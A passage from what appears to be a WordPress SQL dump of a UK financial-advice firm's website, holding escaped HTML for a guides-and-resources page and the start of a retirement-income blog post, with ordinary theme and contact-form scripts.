rel=\"tag\">Guides</a></h4>&#13;\n						</div>&#13;\n					</div>&#13;\n				</div>&#13;\n								<div class=\"portfolio-content\">&#13;\n					<h2 class=\"entry-title\"><a href=\"../portfolio-items/guide-auto-enrolment/\">A Guide To Auto Enrolment</a></h2>&#13;\n					<h4><a href=\"/\" rel=\"tag\">Auto Enrolment</a>, <a href=\"../portfolio_category/guides/\" rel=\"tag\">Guides</a></h4>&#13;\n&#13;\n					<div class=\"post-content\">&#13;\n										<div class=\"excerpt-container\"><p>Click Here To Download Your Guide To Auto Enrolment</p>&#13;\n</div>					</div>&#13;\n				</div>&#13;\n			</div>&#13;\n									<div class=\"portfolio-item guides investment \">&#13;\n								<div class=\"image\">&#13;\n																									<div class=\"image-extras\">&#13;\n						<div class=\"image-extras-content\">&#13;\n							<a style=\"display:inline-block;\" class=\"icon link-icon\" href=\"/\">Permalink</a>&#13;\n																					<a href=\"#\"><img style=\"display:none;\" alt=\"\"/>Gallery</a>&#13;\n							<p>Investing For Income</p>&#13;\n							<h4><a href=\"../portfolio_category/guides/\" rel=\"tag\">Guides</a>, <a href=\"/\" rel=\"tag\">Investment</a></h4>&#13;\n						</div>&#13;\n					</div>&#13;\n				</div>&#13;\n								<div class=\"portfolio-content\">&#13;\n					<h2 class=\"entry-title\"><a href=\"/\">Investing For Income</a></h2>&#13;\n					<h4><a href=\"../portfolio_category/guides/\" rel=\"tag\">Guides</a>, <a href=\"/\" rel=\"tag\">Investment</a></h4>&#13;\n&#13;\n					<div class=\"post-content\">&#13;\n										<div class=\"excerpt-container\"><p>Click Here To Download Your Guide To Investing For Income</p>&#13;\n</div>					</div>&#13;\n				</div>&#13;\n			</div>&#13;\n									<div class=\"portfolio-item guides investment \">&#13;\n								<div class=\"image\">&#13;\n																									<div class=\"image-extras\">&#13;\n						<div class=\"image-extras-content\">&#13;\n							<a style=\"display:inline-block;\" class=\"icon link-icon\" href=\"/\">Permalink</a>&#13;\n																					<a href=\"#\"><img style=\"display:none;\" alt=\"\"/>Gallery</a>&#13;\n							<p>A Guide To Investment – Different Ways To Grow &amp; Protect Your Wealth</p>&#13;\n							<h4><a href=\"../portfolio_category/guides/\" rel=\"tag\">Guides</a>, <a href=\"/\" rel=\"tag\">Investment</a></h4>&#13;\n						</div>&#13;\n					</div>&#13;\n				</div>&#13;\n								<div class=\"portfolio-content\">&#13;\n					<h2 class=\"entry-title\"><a href=\"/\">A Guide To Investment – Different Ways To Grow &amp; Protect Your Wealth</a></h2>&#13;\n					<h4><a href=\"../portfolio_category/guides/\" rel=\"tag\">Guides</a>, <a href=\"/\" rel=\"tag\">Investment</a></h4>&#13;\n&#13;\n					<div class=\"post-content\">&#13;\n										<div class=\"excerpt-container\"><p>Click here to download your Guide To Investment.</p>&#13;\n</div>					</div>&#13;\n				</div>&#13;\n			</div>&#13;\n									<div class=\"portfolio-item guides \">&#13;\n								<div class=\"image\">&#13;\n																									<div class=\"image-extras\">&#13;\n						<div class=\"image-extras-content\">&#13;\n							<a style=\"display:inline-block;\" class=\"icon link-icon\" href=\"../portfolio-items/a-guide-to-protection-planning/\">Permalink</a>&#13;\n																					<a href=\"#\"><img style=\"display:none;\" alt=\"\"/>Gallery</a>&#13;\n							<p>A Guide To Protection Planning</p>&#13;\n							<h4><a href=\"../portfolio_category/guides/\" rel=\"tag\">Guides</a></h4>&#13;\n						</div>&#13;\n					</div>&#13;\n				</div>&#13;\n								<div class=\"portfolio-content\">&#13;\n					<h2 class=\"entry-title\"><a href=\"../portfolio-items/a-guide-to-protection-planning/\">A Guide To Protection Planning</a></h2>&#13;\n					<h4><a href=\"../portfolio_category/guides/\" rel=\"tag\">Guides</a></h4>&#13;\n&#13;\n					<div class=\"post-content\">&#13;\n										<div class=\"excerpt-container\"><p>A guide to protection planning – Helping to protect your family’s lifestyles if your income suddenly changes due to to death or illness.</p>&#13;\n<p>To download this guide please fill out the short form below, we will then email you a link to the guide:</p>&#13;\n</div>					</div>&#13;\n				</div>&#13;\n			</div>&#13;\n									<div class=\"portfolio-item annuities guides \">&#13;\n								<div class=\"image\">&#13;\n																									<div class=\"image-extras\">&#13;\n						<div class=\"image-extras-content\">&#13;\n							<a style=\"display:inline-block;\" class=\"icon link-icon\" href=\"../portfolio-items/a-guide-to-annuities/\">Permalink</a>&#13;\n																					<a href=\"#\"><img style=\"display:none;\" alt=\"\"/>Gallery</a>&#13;\n							<p>A Guide To Annuities</p>&#13;\n							<h4><a href=\"/\" rel=\"tag\">Annuities</a>, <a href=\"../portfolio_category/guides/\" rel=\"tag\">Guides</a></h4>&#13;\n						</div>&#13;\n					</div>&#13;\n				</div>&#13;\n								<div class=\"portfolio-content\">&#13;\n					<h2 class=\"entry-title\"><a href=\"../portfolio-items/a-guide-to-annuities/\">A Guide To Annuities</a></h2>&#13;\n					<h4><a href=\"/\" rel=\"tag\">Annuities</a>, <a href=\"../portfolio_category/guides/\" rel=\"tag\">Guides</a></h4>&#13;\n&#13;\n					<div class=\"post-content\">&#13;\n										<div class=\"excerpt-container\"><p>In this guide we will set the scene to help you secure a bigger retirement income.</p>&#13;\n<p>To download this guide please fill out the short form below, we will then email you a link to the guide:</p>&#13;\n</div>					</div>&#13;\n				</div>&#13;\n			</div>&#13;\n									<div class=\"portfolio-item guides \">&#13;\n								<div class=\"image\">&#13;\n																									<div class=\"image-extras\">&#13;\n						<div class=\"image-extras-content\">&#13;\n							<a style=\"display:inline-block;\" class=\"icon link-icon\" href=\"../portfolio-items/esmart-money/\">Permalink</a>&#13;\n																					<a href=\"#\"><img style=\"display:none;\" alt=\"\"/>Gallery</a>&#13;\n							<p>Esmart Money</p>&#13;\n							<h4><a href=\"../portfolio_category/guides/\" rel=\"tag\">Guides</a></h4>&#13;\n						</div>&#13;\n					</div>&#13;\n				</div>&#13;\n								<div class=\"portfolio-content\">&#13;\n					<h2 class=\"entry-title\"><a href=\"../portfolio-items/esmart-money/\">Esmart Money</a></h2>&#13;\n					<h4><a href=\"../portfolio_category/guides/\" rel=\"tag\">Guides</a></h4>&#13;\n&#13;\n					<div class=\"post-content\">&#13;\n										<div class=\"excerpt-container\"><p>The May / June edition of the eSmart money guide from Equity SMART.</p>&#13;\n<p>To download this guide please fill out the short form below, we will then email you a link to the guide:</p>&#13;\n<p> </p>&#13;\n<p> </p>&#13;\n</div>					</div>&#13;\n				</div>&#13;\n			</div>&#13;\n					</div>&#13;\n			</div>&#13;\n	<div id=\"sidebar\" style=\"display:none\"><div id=\"recent_works-widget-2\" class=\"widget recent_works\"><div class=\"heading\"><p>New Guides</p></div>		<div class=\"recent-works-items clearfix\">&#13;\n								<a href=\"../portfolio-items/smart-money-nov-dec/\" title=\"Smart Money: Nov-Dec\">&#13;\n					</a>&#13;\n						<a href=\"../portfolio-items/critical-illness-guide/\" title=\"Critical Illness Guide\">&#13;\n					</a>&#13;\n						<a href=\"../portfolio-items/guide-auto-enrolment/\" title=\"A Guide To Auto Enrolment\">&#13;\n					</a>&#13;\n				</div>&#13;\n&#13;\n		</div><div id=\"pyre_tabs-widget-2\" class=\"widget pyre_tabs\">		<div class=\"tab-holder\">&#13;\n			<div class=\"tab-hold tabs-wrapper\">&#13;\n				<ul id=\"tabs\" class=\"tabset tabs\"><li><a href=\"#tab-popular\">Popular</a></li>&#13;\n															<li><a href=\"#tab-recent\">Recent</a></li>&#13;\n														</ul><div class=\"tab-box tabs-container\">&#13;\n										<div id=\"tab-popular\" class=\"tab tab_content\" style=\"display: none;\">&#13;\n												<ul class=\"news-list\"><li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../can-i-sell-my-pension-under-55/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../can-i-sell-my-pension-under-55/\">Can I sell my Pension under 55?</a>&#13;\n									<div class=\"meta\">&#13;\n										October 12th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/\">The UK’s Income Protection Time Bomb</a>&#13;\n									<div class=\"meta\">&#13;\n										September 10th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../g-day-impact-gender-directive-insurance/\">&#13;\n										<img width=\"52\" height=\"21\" src=\"../wp-content/uploads/2012/09/headline-image-composite-preview.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"headline-image-composite-preview\"/></a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../g-day-impact-gender-directive-insurance/\">G-day – Impact of the Gender Directive on Insurance</a>&#13;\n									<div class=\"meta\">&#13;\n										September 18th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../best-annuity-rates/\">&#13;\n										<img width=\"52\" height=\"43\" src=\"../wp-content/uploads/2013/02/Lighthouse-symbolism-image-photo1-e1364375976209.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"Annuity Rates\"/></a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../best-annuity-rates/\">What Are The Best Annuity Rates in The UK</a>&#13;\n									<div class=\"meta\">&#13;\n										March 21st, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../will-you-avoid-care-home-costs/\">&#13;\n										<img width=\"52\" height=\"34\" src=\"../wp-content/uploads/2013/02/photodune-2677721-big-ben-s2-e1361782596271.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"goverment report on care home costs uk\"/></a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../will-you-avoid-care-home-costs/\">Will You Avoid Care Home Costs?</a>&#13;\n									<div class=\"meta\">&#13;\n										February 23rd, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n													</ul></div>&#13;\n															<div id=\"tab-recent\" class=\"tab tab_content\" style=\"display: none;\">&#13;\n												<ul class=\"news-list\"><li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../seven-deadly-investment-sins/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../seven-deadly-investment-sins/\">The Seven Deadly Investment Sins</a>&#13;\n									<div class=\"meta\">&#13;\n										February 10th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../mortgage-strategic-alliance/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../mortgage-strategic-alliance/\">Mortgage Strategic Alliance</a>&#13;\n									<div class=\"meta\">&#13;\n										February 5th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../esmart-money-januaryfebruary-2014-issue/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../esmart-money-januaryfebruary-2014-issue/\">eSmart Money January/February 2017 issue</a>&#13;\n									<div class=\"meta\">&#13;\n										January 7th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../how-much-money-can-i-get-pension/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../how-much-money-can-i-get-pension/\">How much Money can I get out of my Pension?</a>&#13;\n									<div class=\"meta\">&#13;\n										October 31st, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../what-does-a-wealth-managerdo/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../what-does-a-wealth-managerdo/\">What Does a Wealth Manager Do?</a>&#13;\n									<div class=\"meta\">&#13;\n										September 5th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n													</ul></div>&#13;\n														</div>&#13;\n			</div>&#13;\n		</div>&#13;\n		</div><div id=\"categories-3\" class=\"widget widget_categories\"><div class=\"heading\"><p>Post Categories</p></div><select name=\"cat\" id=\"cat\" class=\"postform\"><option value=\"-1\">Select Category</option><option class=\"level-0\" value=\"13\">Annuities  (1)</option><option class=\"level-0\" value=\"8\">Insurance Protection  (2)</option><option class=\"level-0\" value=\"4\">Pensions  (4)</option><option class=\"level-0\" value=\"6\">Trusts  (1)</option><option class=\"level-0\" value=\"1\">Wealth Management  (8)</option></select><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\n	var dropdown = document.getElementById(\"cat\");\r\n	function onCatChange() {\r\n		if ( dropdown.options[dropdown.selectedIndex].value > 0 ) {\r\n			location.href = \"http://www.equalitywalk.org.uk/?cat=\"+dropdown.options[dropdown.selectedIndex].value;\r\n		}\r\n	}\r\n	dropdown.onchange = onCatChange;\r\n/* ]]]]><![CDATA[> */\r\n]]></script></div><div id=\"social_links-widget-2\" class=\"widget social_links\"><div class=\"heading\"><p>Get Social</p></div>		<ul class=\"social-networks  clearfix\"><li class=\"rss\">&#13;\n				<a class=\"rss\" href=\"../feed/\" target=\"\">RSS</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>RSS</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n												<li class=\"twitter\">&#13;\n				<a class=\"twitter\" href=\"https://twitter.com/Invest\" target=\"\">Twitter</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>Twitter</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n																																																					</ul></div></div>&#13;\n		</div>&#13;\n	</div>&#13;\n				<footer class=\"footer-area\"><div class=\"avada-row\">&#13;\n			<section class=\"columns columns-3\"><article class=\"col\"><div id=\"recent-posts-3\" class=\"footer-widget-col widget_recent_entries\">		<p>Latest Wealth Management News</p>		<ul><li>&#13;\n				<a href=\"../seven-deadly-investment-sins/\">The Seven Deadly Investment Sins</a>&#13;\n							<span class=\"post-date\">February 10, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../mortgage-strategic-alliance/\">Mortgage Strategic Alliance</a>&#13;\n							<span class=\"post-date\">February 5, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../esmart-money-januaryfebruary-2014-issue/\">eSmart Money January/February 2017 issue</a>&#13;\n							<span class=\"post-date\">January 7, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../how-much-money-can-i-get-pension/\">How much Money can I get out of my Pension?</a>&#13;\n							<span class=\"post-date\">October 31, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../what-does-a-wealth-managerdo/\">What Does a Wealth Manager Do?</a>&#13;\n							<span class=\"post-date\">September 5, 2017</span>&#13;\n						</li>&#13;\n				</ul><div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"text-13\" class=\"footer-widget-col widget_text\"><p>Equity SMART</p>			<div class=\"textwidget\"><p>This year, 2017, sees us reach our 20 year anniversary. In all that time we’ve seen real changes in the financial market, but our core values have forever remained the same. Put simply, we’ve always striven to offer unbiased and objective financial advice, with a view to protecting and enhancing our client’s wealth and sense of well-being. Welcome to our company.</p>&#13;\n</div>&#13;\n		<div style=\"clear:both;\"/></div><div id=\"recent_works-widget-3\" class=\"footer-widget-col recent_works\"><p>Useful Guides</p>		<div class=\"recent-works-items clearfix\">&#13;\n								<a href=\"../portfolio-items/smart-money-nov-dec/\" title=\"Smart Money: Nov-Dec\">&#13;\n					</a>&#13;\n						<a href=\"../portfolio-items/critical-illness-guide/\" title=\"Critical Illness Guide\">&#13;\n					</a>&#13;\n						<a href=\"../portfolio-items/guide-auto-enrolment/\" title=\"A Guide To Auto Enrolment\">&#13;\n					</a>&#13;\n						<a href=\"/\" title=\"Investing For Income\">&#13;\n					</a>&#13;\n				</div>&#13;\n&#13;\n		<div style=\"clear:both;\"/></div>				</article><article class=\"col\"/><article class=\"col last\"/></section></div>&#13;\n	</footer><footer id=\"footer\"><div class=\"avada-row\">&#13;\n					<ul class=\"copyright\"><li><br/><br/></li>&#13;\n			</ul></div>&#13;\n	</footer></div><!-- wrapper -->&#13;\n	&#13;\n	&#13;\n	<script type=\"text/javascript\" src=\"../maps/api/js_v_3.exp_amp_sensor_false_amp_language_en.js\"/><!-- W3TC-include-js-head --><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/contact-form-7/includes/js/scripts.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar iphormL10n = {\"error_submitting_form\":\"An error occurred submitting the form\",\"swfupload_flash_url\":\"http://www.equalitywalk.org.uk/wp-includes/js/swfupload/swfupload.swf\",\"swfupload_upload_url\":\"http://www.equalitywalk.org.uk/?iphorm_swfupload=1\",\"swfupload_too_many\":\"You have attempted to queue too many files\",\"swfupload_file_too_big\":\"This file exceeds the maximum upload size\",\"swfupload_file_empty\":\"This file is empty\",\"swfupload_file_type_not_allowed\":\"This file type is not allowed\",\"swfupload_unknown_queue_error\":\"Unknown queue error, please try again later\",\"swfupload_upload_error\":\"Upload error\",\"swfupload_upload_failed\":\"Upload failed\",\"swfupload_server_io\":\"Server IO error\",\"swfupload_security_error\":\"Security error\",\"swfupload_limit_exceeded\":\"Upload limit exceeded\",\"swfupload_validation_failed\":\"Validation failed\",\"swfupload_upload_stopped\":\"Upload stopped\",\"swfupload_unknown_upload_error\":\"Unknown upload error\",\"plugin_url\":\"http://www.equalitywalk.org.uk/wp-content/plugins/iphorm-form-builder\",\"preview_no_submit\":\"The form cannot be submitted in the preview\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.pack.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/themes/light/rounded.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.mousewheel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.flexslider.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/modernizr-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.prettyPhoto-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.fitvids-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/gmap-min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar js_local_vars = {\"dropdown_goto\":\"Go to...\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/main-min.js\"/></body>','Resources','','publish','closed','closed','','resources','','','2017-09-21 16:34:38','2017-09-21 16:34:38','',0,'http://www.equalitywalk.org.uk/resources',0,'page','',0);
INSERT INTO `wp_posts` VALUES (100,1,'2017-09-21 16:34:39','2017-09-21 16:34:39','<body class=\"single single-post postid-5406 single-format-standard wpb-js-composer js-comp-ver-3.5.4 vc_responsive\">&#13;\n&#13;\n&#13;\n&#13;\n&#13;\n	<div id=\"wrapper\">&#13;\n		<div class=\"header-wrapper\">&#13;\n			<div class=\"header-v2\">&#13;\n	<div class=\"header-social\">&#13;\n		<div class=\"avada-row\">&#13;\n			&#13;\n			<div class=\"alignright\">&#13;\n				<div class=\"top-menu\">&#13;\n	<ul id=\"snav\" class=\"menu\"><li id=\"menu-item-4739\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-4739\"><a href=\"/\">Home</a></li>&#13;\n<li id=\"menu-item-4811\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-4811\"><a href=\"../about-us/\">About</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-5319\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-5319\"><a href=\"../our-team/\">Our Team</a></li>&#13;\n	<li id=\"menu-item-6369\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6369\"><a href=\"../about-us/testimonials/\">Testimonials</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-6489\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6489\"><a href=\"../resources/\">Resources</a></li>&#13;\n<li id=\"menu-item-5417\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-5417\"><a href=\"../our-blog/\">Blog</a></li>&#13;\n<li id=\"menu-item-6142\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-6142\"><a href=\"https://rsr.wrapadviser.co.uk/home.aspx?logout=1\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-menu\',\'http://rsr.wrapadviser.co.uk\']);\">Login</a></li>&#13;\n<li id=\"menu-item-4746\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-4746\"><a href=\"../contact-us/\">Contact</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-6358\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6358\"><a href=\"../terms-of-use/\">Terms Of Use</a></li>&#13;\n	<li id=\"menu-item-6359\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6359\"><a href=\"../privacy-policy/\">Privacy Policy</a></li>&#13;\n	<li id=\"menu-item-6357\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6357\"><a href=\"../cookies/\">Cookies</a></li>&#13;\n</ul></li>&#13;\n			</ul></div>			</div>&#13;\n		</div>&#13;\n	</div>&#13;\n	<header id=\"header\"><div class=\"avada-row\" style=\"margin-top:0px;margin-bottom:0px;\">&#13;\n			<div class=\"logo\" style=\"margin-right:0px;margin-top:17px;margin-left:0px;margin-bottom:20px;\">&#13;\n				<a href=\"/\">&#13;\n					<img src=\"../wp-content/uploads/2013/06/RSR4.png\" alt=\"Equity SMART\" class=\"normal_logo\"/></a>&#13;\n			</div>&#13;\n						<nav id=\"nav\" class=\"nav-holder\"><ul id=\"nav\" class=\"menu\"><li id=\"menu-item-27\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-27\"><a href=\"../pensions/\">Pensions</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-967\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-967\"><a href=\"../pensions/pension-release/\">Pension Release</a></li>&#13;\n	<li id=\"menu-item-741\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-741\"><a href=\"../pensions/pension-transfer/\">Pension Transfer</a></li>&#13;\n	<li id=\"menu-item-136\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-136\"><a href=\"../pensions/auto-enrolment-pensions/\">Auto Enrolment Pensions</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-6494\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6494\"><a href=\"../auto-enrolment-report/\">Auto Enrolment Report</a></li>&#13;\n	</ul></li>&#13;\n	<li id=\"menu-item-6154\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6154\"><a href=\"../pension-review/\">Pension Review</a></li>&#13;\n	<li id=\"menu-item-5636\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-5636\"><a href=\"../pension-forecast/\">Pension Forecast</a></li>&#13;\n	<li id=\"menu-item-95\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-95\"><a href=\"../pensions/sipps/\">SIPPS</a></li>&#13;\n	<li id=\"menu-item-105\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-105\"><a href=\"../pensions/stakeholder-pensions/\">Stakeholder Pensions</a></li>&#13;\n	<li id=\"menu-item-127\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-127\"><a href=\"../pensions/occupational-pensions/\">Occupational Pensions</a></li>&#13;\n	<li id=\"menu-item-133\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-133\"><a href=\"../pensions/group-pension-plan/\">Group Pension Plan</a></li>&#13;\n	<li id=\"menu-item-139\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-139\"><a href=\"../pensions/income-drawdown/\">Income Drawdown</a></li>&#13;\n	<li id=\"menu-item-6852\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-6852\"><a>More Information</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-6848\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6848\"><a href=\"../tracking-down-your-lost-pension/\">Lost Pension</a></li>&#13;\n	</ul></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-47\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-47\"><a href=\"..\">Investments</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-121\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-121\"><a href=\"..isas/\">ISAs</a></li>&#13;\n	<li id=\"menu-item-118\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-118\"><a href=\"..lump-sum-investment/\">Lump Sum Investment</a></li>&#13;\n	<li id=\"menu-item-102\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-102\"><a href=\"..offshore-bonds/\">Offshore Bonds</a></li>&#13;\n	<li id=\"menu-item-124\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-124\"><a href=\"..unit-trusts-oeics/\">Unit Trusts &amp; OEICs</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-46\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-46\"><a href=\"../\">Trusts</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-108\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-108\"><a href=\"../asset-protection-trust/\">Asset Protection Trust</a></li>&#13;\n	<li id=\"menu-item-114\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-114\"><a href=\"../discretionary-\">Discretionary Trusts</a></li>&#13;\n	<li id=\"menu-item-115\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-115\"><a href=\"../absolute-\">Absolute Trusts</a></li>&#13;\n	<li id=\"menu-item-143\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-143\"><a href=\"../gift-loan-schemes/\">Gift &amp; Loan Trust</a></li>&#13;\n	<li id=\"menu-item-146\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-146\"><a href=\"../wills-and-trust/\">Wills and Trust</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-3381\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-3381\"><a href=\"../insurance-protection/\">Insurance</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-3535\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-3535\"><a href=\"../critical-illness-insurance-2-0/\">Critical Illness</a></li>&#13;\n	<li id=\"menu-item-3585\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-3585\"><a href=\"../serious-illness-cover/\">Serious Illness</a></li>&#13;\n	<li id=\"menu-item-4633\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-4633\"><a href=\"../relevant-life-plan/\">Relevant Life Plan</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-44\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-44\"><a href=\"../wealth-platform/\">Wealth Platform</a></li>&#13;\n<li id=\"menu-item-24\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-24\"><a href=\"../contact-us/\">Contact</a></li>&#13;\n	</ul></nav></div>&#13;\n	</header></div>		</div>&#13;\n				<div id=\"sliders-container\">&#13;\n						</div>&#13;\n						<div class=\"page-title-container\">&#13;\n		<div class=\"page-title\">&#13;\n			<div class=\"page-title-wrapper\">&#13;\n						<h1 class=\"entry-title\">Retirement Income. The Final Frontier.</h1>&#13;\n												<ul class=\"breadcrumbs\"><li> <a href=\"/\">Home</a></li><li><a href=\"../category/wealth-management/\" title=\"Wealth Management\">Wealth Management</a></li><li>Retirement Income. The Final Frontier.</li></ul></div>&#13;\n		</div>&#13;\n	</div>&#13;\n						&#13;\n					<div id=\"main\" class=\"\" style=\"overflow:hidden !important;\">&#13;\n		<div class=\"avada-row\" style=\"\">&#13;\n					<div id=\"content\" style=\"float:left;\">&#13;\n										<div class=\"single-navigation clearfix\">&#13;\n			<a href=\"../best-annuity-rates/\" rel=\"prev\">Previous</a>			<a 